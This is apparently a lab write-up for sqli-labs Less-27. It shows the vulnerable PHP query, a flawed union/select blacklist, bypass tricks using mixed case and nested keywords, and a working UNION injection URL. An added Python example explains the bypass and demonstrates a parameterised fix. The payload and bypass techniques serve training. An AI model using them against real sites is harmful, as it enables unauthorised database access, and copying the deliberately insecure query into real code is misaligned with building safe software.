sqli-labs: Less-27 (union, SELECT, filter bypass)
Less-27
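From the hint screen we can see that this lesson is about getting past the filtering of union and select, so let's look at the source code:
SQL statement:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
Filtering mechanism:
function blacklist($id)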
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out select.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}
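From the SQL statement we can see that the id parameter is wrapped in single quotes, so to construct a SQL statement we have to close the preceding single quote. The filter also strips the most commonly used keywords, select and union. Now let's look at how to get around it:
Mixed case: Union\SelecT and so on
String combinations that get past the filter: UNinUNIONon
Here is a simple test: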
Payload: http://192.168.11.136/sqli-labs/Less-27?id=-1'unIon%a0SelEcT%a01,database(),3||'1
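Why the blacklist fails on the test input above, and what a fix looks like, as an added example that is not part of the original post or of sqli-labs. It assumes a Python port of blacklist() with the same patterns in the same order, an in-memory SQLite table standing in for the lab's MySQL users table, and a hypothetical lookup_user() helper; the sample row is constructed.

```python
import re
import sqlite3

# Python port of the blacklist() shown above: same patterns, same order.
# Every keyword pattern is case-sensitive and lists only three spellings.
_PATTERNS = [r"[/*]", r"-", r"#", r"[ +]", r"select", r"[ +]",
             r"union", r"select", r"UNION", r"SELECT", r"Union", r"Select"]

def blacklist(value):
    for pattern in _PATTERNS:
        value = re.sub(pattern, "", value)
    return value

def surviving_keywords(value):
    """Keywords still present after filtering, matched case-insensitively."""
    return re.findall(r"union|select", blacklist(value), flags=re.IGNORECASE)

def lookup_user(conn, raw_id):
    """Hardened lookup (hypothetical helper): allow-list, then bind."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None  # anything that is not a plain integer is rejected
    cur = conn.execute(
        "SELECT id, username FROM users WHERE id = ? LIMIT 1", (int(raw_id),))
    return cur.fetchone()

def demo_db():
    # Constructed sample data, not the lab's real table contents.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice')")
    return conn

# The id value from the page's test URL after URL-decoding (%a0 -> \xa0).
PAGE_INPUT = "-1'unIon\xa0SelEcT\xa01,database(),3||'1"

if __name__ == "__main__":
    print(repr(blacklist(PAGE_INPUT)))      # quote and keywords still intact
    print(surviving_keywords(PAGE_INPUT))   # spellings the filter never lists
    conn = demo_db()
    print(lookup_user(conn, "1"))           # normal request still works
    print(lookup_user(conn, PAGE_INPUT))    # rejected before reaching SQL
```

The filter removes the leading minus sign but leaves the quote, both keywords and the 0xA0 separator untouched, while the bound integer parameter never lets the input become part of the SQL text.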